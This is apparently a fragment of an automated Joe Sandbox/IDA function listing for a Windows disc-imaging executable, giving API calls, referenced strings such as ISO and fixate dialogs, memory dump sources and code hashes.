Part of subcall function 00477350: MultiByteToWideChar.KERNEL32(00000001,?,004267F4,?,?,00000107), ref: 00477384

_swscanf.LIBCMT ref: 00437021
GetActiveWindow.USER32 ref: 00437102

Strings

'%[^']' '%[^']' '%[^']' %[^, xrefs: 0043701B
'' '' '', xrefs: 00436F9C
%d,%d,%d%*d) %[^, xrefs: 00436F5A
Removable , xrefs: 00437031

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _swscanf$ActiveApisByteCharFileMultiWideWindow_memset_strncmp_vscan_fn
String ID: %d,%d,%d%*d) %[^$'%[^']' '%[^']' '%[^']' %[^$'' '' ''$Removable
API String ID: 3184811936-1172060960
Opcode ID: f55f42d384c0dea175971488e670638a244d06a28897211edb587259a5e6ec7b
Instruction ID: 989120a95377cbfd3cbd36424eef76fe9f0ca06c9c8d1742faf60bc2225f2ff7
Opcode Fuzzy Hash: f55f42d384c0dea175971488e670638a244d06a28897211edb587259a5e6ec7b
Instruction Fuzzy Hash: F661D9B2548341AFC764DF65C881FABB7F8AF88704F40591FF58983241E778A509CB6A

Function 004227C0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 00422803
SetDlgItemTextW.USER32(?,000004B2,?), ref: 00422833
SetDlgItemTextW.USER32(?,000003FA,?), ref: 00422858
SetDlgItemTextW.USER32(?,000004B3,?), ref: 0042287D
SetDlgItemTextW.USER32(?,000004B4,?), ref: 004228A2
SetDlgItemTextW.USER32(?,000003FD,?), ref: 004228C7
SetDlgItemTextW.USER32(?,000004B6,?), ref: 004228EC

Strings

confirmfilereplace, xrefs: 004227D5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Text$Item$Window
String ID: confirmfilereplace
API String ID: 820206838-3470185548
Opcode ID: a476141435195703545e6389a8795c5c8fb6c4327d6a8f3f7069a66195c031f9
Instruction ID: 2476cfd1f21c4a2af595cfb9193d7007d1120f9cb5d327ed75b5ad5549d9dd6d
Opcode Fuzzy Hash: a476141435195703545e6389a8795c5c8fb6c4327d6a8f3f7069a66195c031f9
Instruction Fuzzy Hash: 82314AB93447007FD608EB51DD92D7BB36AEBC4710F10C92EBA564B282DBB8E905CB54

Function 0043D190 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 0043D1D9
SetDlgItemTextW.USER32(?,00000002,?), ref: 0043D1F8
SetDlgItemTextW.USER32(?,00000485,?), ref: 0043D21D
SetDlgItemTextW.USER32(?,000003F2,?), ref: 0043D242
SetDlgItemTextW.USER32(?,000003F8,?), ref: 0043D267

Strings

fixate, xrefs: 0043D269
erase, xrefs: 0043D1A5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: erase$fixate
API String ID: 3367045223-3791842417
Opcode ID: 74ad6717f893dc58d0ec2022a778961d490ec119900f1c321482d4025d500ffa
Instruction ID: 00c54d92ee3e0dc898e846f312471345ac35f2dc5bd01dfe3d8ec5eac84ccd0a
Opcode Fuzzy Hash: 74ad6717f893dc58d0ec2022a778961d490ec119900f1c321482d4025d500ffa
Instruction Fuzzy Hash: 7B3185B93443007FD918AB50DC82EBB639ADBC8714F10C96EFA565B2C2DE74E8058B14

Function 0045E350 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000044A), ref: 0045E365
SendMessageW.USER32(00000000,00001036,00000000,00000020), ref: 0045E380
SendMessageW.USER32 ref: 0045E3D4
SendMessageW.USER32 ref: 0045E430
SendMessageW.USER32(?,00001061,00000002,0000000F), ref: 0045E48C
SetDlgItemTextW.USER32(?,00000447,004EF172), ref: 0045E4AD
SetDlgItemTextW.USER32(?,00000448,004EF2B2), ref: 0045E4BD

Strings

-, xrefs: 0045E3C0
v, xrefs: 0045E465

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Item$Text
String ID: -$v
API String ID: 915615637-2270837006
Opcode ID: 505ed27ad45f6358075b8958c59247794bc815180b410516cc9347028df46f93
Instruction ID: 67ca02c1c0976fc186b442906d5d2dfb44af64678edd15369d931b417ad93dc0
Opcode Fuzzy Hash: 505ed27ad45f6358075b8958c59247794bc815180b410516cc9347028df46f93
Instruction Fuzzy Hash: 3741EEB1908301AFD350DF65C945B5BBBE4FB88704F00492EF598D7281E7B5DA448F9A

Function 0044A6B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,00000000), ref: 0044A724
GetVolumeInformationW.KERNEL32(?,?,0000003F,00000000,00000000,00000000,00000000,00000000), ref: 0044A74B
lstrcatW.KERNEL32(?,?), ref: 0044A773
lstrcatW.KERNEL32(?, (X:)), ref: 0044A782
lstrlenW.KERNEL32(?), ref: 0044A78C
lstrcatW.KERNEL32(?,004C97D8), ref: 0044A7B2
lstrlenW.KERNEL32(?), ref: 0044A7C0
GetActiveWindow.USER32 ref: 0044A7F0

Strings

(X:), xrefs: 0044A775

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$lstrlen$ActiveInformationVolumeWindowlstrcpy
String ID: (X:)
API String ID: 3731567538-1741776597
Opcode ID: 91a008185bf87434cd24d23923969fc2508cc6c61007659c2ca21380c4e68d45
Instruction ID: be2a4e2ddac3d33891ef7773142faec50ca94cbb8fc94ba2ae0dca765ccc4cce
Opcode Fuzzy Hash: 91a008185bf87434cd24d23923969fc2508cc6c61007659c2ca21380c4e68d45
Instruction Fuzzy Hash: 0C315975518341ABE375EB64D859FEFB3A8BFD8300F00482EE54A832A0EA359544CB5B

Function 0041A810 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041A835
IsDlgButtonChecked.USER32(?,000004A4), ref: 0041A84A
GetDlgItemTextW.USER32(?,000004A6,0000001F,0000001F), ref: 0041A871
_swscanf.LIBCMT ref: 0041A884
GetDlgItemTextW.USER32(?,000004A8,?,0000001F), ref: 0041A89C
_swscanf.LIBCMT ref: 0041A8AF
EndDialog.USER32(?,?), ref: 0041A8DE

Strings

%d %d, xrefs: 0041A8C3
0x%x, xrefs: 0041A87E, 0041A8A9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText_swscanf$ButtonCheckedDialogMessageSend
String ID: %d %d$0x%x
API String ID: 756432788-2487363599
Opcode ID: eae4ebbedb5245028f276710b43d826feb8ce0e77a859aa91970adcc7b731bc5
Instruction ID: e2779044ae19b83a57fd00957d3181761726a356932157d61af876e30088dd3d
Opcode Fuzzy Hash: eae4ebbedb5245028f276710b43d826feb8ce0e77a859aa91970adcc7b731bc5
Instruction Fuzzy Hash: 9B219DB9240300AFD654DB65CD96FA7B7E9AFC8B10F00C91EF68A87291D674F400CB69

Function 00426380 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00416AF0: _memset.LIBCMT ref: 00416B0B
Part of subcall function 00416AF0: lstrlenW.KERNEL32(?), ref: 00416B9B
Part of subcall function 00416AF0: lstrcpynW.KERNEL32(?,?,00000104), ref: 00416BAD

GetActiveWindow.USER32 ref: 004263C2

Part of subcall function 00416740: GetOpenFileNameW.COMDLG32(?), ref: 00416769

SetDlgItemTextW.USER32(?,00000468,?), ref: 004263E8
GetParent.USER32(?), ref: 004263F2
GetDlgItem.USER32(00000000,00000001), ref: 004263FD
EnableWindow.USER32(00000000), ref: 00426404

Strings

iso, xrefs: 004263AA
Untitled, xrefs: 004263A5
LHL, xrefs: 004263BA
Disc Images (*.iso), xrefs: 0042639B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemWindow$ActiveEnableFileNameOpenParentText_memsetlstrcpynlstrlen
String ID: Disc Images (*.iso)$LHL$Untitled$iso
API String ID: 3754488058-857109384
Opcode ID: 9a4e395be387db2a01a1ba8441412e9f81a2019f2fef5bd14c87a42286bca401
Instruction ID: 7eb7ad46660775fc0e3a15bee34875d4a23a5611e35af0e7799bbb7d121280b1
Opcode Fuzzy Hash: 9a4e395be387db2a01a1ba8441412e9f81a2019f2fef5bd14c87a42286bca401
Instruction Fuzzy Hash: 4611C8B56003016BD760EB74DE5AFAB37A8AB84704F00881EF645D3181DE78D804CB6D

Function 0043E489 Relevance: 15.1, APIs: 10, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000143,00000000,0000044F), ref: 0043E4CA
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E4D9
SendMessageW.USER32(?,00000151,-00000001,00000000), ref: 0043E4E7
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E505
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0043E521
EnableWindow.USER32(?,00000000), ref: 0043E52F
GetDlgItem.USER32(00000000,00000001), ref: 0043E537
EnableWindow.USER32(00000000,00000000), ref: 0043E540
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0043E54F
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E565

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$EnableWindow$Item
String ID:
API String ID: 2844959665-0
Opcode ID: 38fb7811861fd9bf1fce2b554e679f8ed782d68b394dd57c98ff6c76195381ca
Instruction ID: 57460a0801647051db7fa120e7f0247f45ad532f2ad26fb9b1cf186d74fdc402
Opcode Fuzzy Hash: 38fb7811861fd9bf1fce2b554e679f8ed782d68b394dd57c98ff6c76195381ca
Instruction Fuzzy Hash: E621DB7134030477E634A7669D83F7BB39DAFC8B04F50581EB742AA6D0CAA8F8008769

Function 00420C85 Relevance: 15.1, APIs: 10, Instructions: 80stringwindowfileCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,004C4DCC,?), ref: 00420CA0
lstrcmpW.KERNEL32(?,004C4DC4), ref: 00420CB4
lstrcpyW.KERNEL32(?,?), ref: 00420CD1
lstrcpyW.KERNEL32(?,?), ref: 00420CEF
SendMessageW.USER32(?,00000143,00000000,?), ref: 00420D19
lstrcmpW.KERNEL32(?,004EE70C), ref: 00420D25
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00420D3A
SendMessageW.USER32(?,0000014E,-00000001,00000000), ref: 00420D49
FindNextFileW.KERNEL32(000000FF,?), ref: 00420D55
FindClose.KERNEL32(000000FF), ref: 00420D68

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSendlstrcmp$Findlstrcpy$CloseFileNext
String ID:
API String ID: 2090877427-0
Opcode ID: d6c68a91e669a2f084f08ceaca094ab71bcbc4725c686a73e270ad2203854e10
Instruction ID: c2d4f61651d255e2e35251dc700dd9d0d107882215c877eb27e31ba007dc688d
Opcode Fuzzy Hash: d6c68a91e669a2f084f08ceaca094ab71bcbc4725c686a73e270ad2203854e10
Instruction Fuzzy Hash: 81215171204305ABD724DBA0EC92FBBB3A9FFC4704F444D1DB64987180EB79E5048759

Function 004231D1 Relevance: 15.1, APIs: 10, Instructions: 64threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004231E2
SetEvent.KERNEL32(?), ref: 004231F1
WaitForSingleObject.KERNEL32(?,00001388), ref: 00423200
TerminateThread.KERNEL32(?,000000FE), ref: 00423213
CloseHandle.KERNEL32(?), ref: 0042321D
CloseHandle.KERNEL32(?), ref: 0042322A
CloseHandle.KERNEL32(?), ref: 00423237
CloseHandle.KERNEL32(?), ref: 00423244
CloseHandle.KERNEL32(?), ref: 00423251
CloseHandle.KERNEL32(00000000), ref: 00423260

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CloseHandle$Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 3710849930-0
Opcode ID: 5c2b74c49cf7642143daa052ed5c2b93cdd4122173fae1591a22fd69db3c2942
Instruction ID: b76916d0ab485964744a3500b337e70013b186b72998732ed7bf9ee910f81443
Opcode Fuzzy Hash: 5c2b74c49cf7642143daa052ed5c2b93cdd4122173fae1591a22fd69db3c2942
Instruction Fuzzy Hash: 0711F9B1A00751DBC7209FAAEDC4817F7F9BF543113908E6EE196D3620C778E9448E64

Function 00421130 Relevance: 15.1, APIs: 10, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00421138
GetDeviceCaps.GDI32(00000000), ref: 0042113F
LoadBitmapW.USER32(?,000000D8), ref: 0042115E
ImageList_Create.COMCTL32(00000010,00000010,00000020,00000000,00000006), ref: 00421170
ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0042117D
DeleteObject.GDI32(00000000), ref: 00421184
LoadBitmapW.USER32(?,000000D9), ref: 00421199
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000000,00000006), ref: 004211AB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004211BB
DeleteObject.GDI32(00000000), ref: 004211C2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ImageList_$BitmapCreateDeleteLoadObject$CapsDeviceMasked
String ID:
API String ID: 258232272-0
Opcode ID: 250978ae4c38a33949d5701c1c1789b18ac42b18673e4fa063865d56fafdde26
Instruction ID: d54b95794de27e8eed6ac2b15dd2f259288d9fd927ca556fe40a69d1167e3f73
Opcode Fuzzy Hash: 250978ae4c38a33949d5701c1c1789b18ac42b18673e4fa063865d56fafdde26
Instruction Fuzzy Hash: B3014032780310BBE7A46BA1BD1DF8A3A65FB89B51F010425F302EA1E0CBB99444976D

Function 00460110 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

projectprop, xrefs: 00460125

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID: projectprop
API String ID: 0-1887307507
Opcode ID: 8a70cfdfe71c47c88f9665afb3d4c969e283bb58aeff36ba8de5af62ac45461d
Instruction ID: d660456281fecbc2d7450db90604d856de054cbfd6310d7a4865497bb29007c8
Opcode Fuzzy Hash: 8a70cfdfe71c47c88f9665afb3d4c969e283bb58aeff36ba8de5af62ac45461d
Instruction Fuzzy Hash: 3A6172B57407006BD624EF559C82F7B73AAABC4B04F508C0DF7569B3C2EA64EC05876A

Function 00427270 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 168COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00427284
_strncmp.LIBCMT ref: 00427310
_swscanf.LIBCMT ref: 00427342
_strncmp.LIBCMT ref: 0042742A

Strings

addr: %8ld cnt: %ld, xrefs: 0042732C
Time total: , xrefs: 00427424
addr: , xrefs: 0042730A
end: , xrefs: 0042727C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp$_swscanf
String ID: Time total: $addr: $addr: %8ld cnt: %ld$end:
API String ID: 3955417911-4035492515
Opcode ID: 98bc52a13b01f25e9cdc08f88169f7252d5de3bd5c76231f9af8dd8c8bdd7ae6
Instruction ID: 5c776bf01eb67e73c8a6a7846222759ab194f2f293c43aaeeac24f6586b54642
Opcode Fuzzy Hash: 98bc52a13b01f25e9cdc08f88169f7252d5de3bd5c76231f9af8dd8c8bdd7ae6
Instruction Fuzzy Hash: BE51ADB16047019BD310EF25CC41B5BB7E4EF88711F144A1EE9A997342DB39F848CBAA

Function 00426FE0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00426FF4
